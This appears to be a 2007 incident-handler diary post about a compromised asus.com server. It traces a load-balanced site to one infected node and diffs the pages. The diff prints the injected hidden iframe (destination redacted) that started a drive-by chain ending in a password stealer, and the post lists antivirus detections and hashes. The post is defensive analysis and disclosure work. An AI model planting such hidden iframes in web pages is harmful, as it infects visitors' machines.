In the past days a handful of readers had sent us notes that asus.com was compromised. We unfortunately could not find anything wrong in the html at all.

Today the kaspersky blog had an entry about a ANI exploit loaded via an iframe at asus.com.

So we fetch a new copy, still nothing to be seen. Until Johannes suggested asus.com might be load balanced, and yes indeed it seems it is using DNS load balancing:

$ dig asus.com a

; <<>> DiG 9.2.3 <<>> asus.com a
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;asus.com.                      IN      A

;; ANSWER SECTION:
asus.com.               14400   IN      A       195.33.130.151
asus.com.               14400   IN      A       205.158.107.130

;; AUTHORITY SECTION:
asus.com.               14400   IN      NS      dns3.asus.com.
asus.com.               14400   IN      NS      dns7.asus.com.

;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Apr  6 23:33:01 2007
;; MSG SIZE  rcvd: 96

Fetching a copy of the home page of both servers, and comparing the resulting page yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
55c55
<                                                               
</table>
---
>                                                               
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003 
width=100 height=0></iframe>

Just goes to learn that a load balanced site is a pain to investigate if only some of the servers are affected.

The script at the time we looked at it was obfuscated and leads to a VBscript, that's up to no good pointing to another obfuscated javascript and a executable cloaked as a jpg file.

That file gives following over at virustotal:

Antivirus	Version	Update	Result
AhnLab-V3	2007.4.7.0	20070406	-
AntiVir	7.3.1.48	20070406	TR/Drop.Ag.344576.B
Authentium	4.93.8	20070406	Possibly a new variant of W32/PWStealer.gen1
Avast	4.7.936.0	20070406	Win32:Tibs-ADO
AVG	7.5.0.447	20070405	-
BitDefender	7.2	20070406	-
CAT-QuickHeal	9.00	20070406	(Suspicious) - DNAScan
ClamAV	devel-20070312	20070406	-
DrWeb	4.33	20070406	-
eSafe	7.0.15.0	20070406	suspicious Trojan/Worm
eTrust-Vet	30.7.3546	20070406	Win32/NSAnti
Ewido	4.0	20070406	-
F-Prot	4.3.1.45	20070404	W32/PWStealer.gen1
F-Secure	6.70.13030.0	20070406	-
FileAdvisor	1	20070407	-
Fortinet	2.85.0.0	20070406	suspicious
Ikarus	T3.1.1.3	20070406	MalwareScope.Worm.Viking.3
Kaspersky	4.0.2.24	20070406	Trojan-PSW.Win32.OnLineGames.kw
McAfee	5003	20070406	New Malware.bc
Microsoft	1.2405	20070406	-
NOD32v2	2171	20070406	-
Norman	5.80.02	20070405	-
Panda	9.0.0.4	20070406	Suspicious file
Prevx1	V2	20070407	-
Sophos	4.16.0	20070406	Mal/EncPk-F
Sunbelt	2.2.907.0	20070403	-
Symantec	10	20070406	-
TheHacker	6.1.6.085	20070404	-
VBA32	3.11.3	20070406	Trojan-PSW.Win32.Nilage.ara
VirusBuster	4.3.7:9	20070406	-
Webwasher-Gateway	6.0.1	20070406	Trojan.Drop.Ag.344576.B

File:

Name	next3.png
Size	100539
md5	42a248b8634da52d6044f87db9a8d794
sha1	cf612836be3c763ab9dc2c9afc0ccc112f2c2a04
Date scanned	04/07/2007 00:09:16 (CET)

Password stealer it seems, same old goal.

I've not seen an ANI exploit in there right now, but we can be easily looking at something that's dynamic in some other way as well.

UPDATE #1:
It seems asus did take down the hacked server in the mean time.

UPDATE #2:
That second javascript referred in the vbscript above didn't decode, it seems it's just not encoded right, but when decoding the string with a plain base64 routine, it does decode to what leads to an ANI exploit. You never know what a buggy script and a buggy browser do together.

UPDATE #3:
Roger tested other language versions of the asus websites and there are more references to the first javascript with an iframe loading it out there.

Off to warn them once again...

--
Swa Frantzen -- NET2S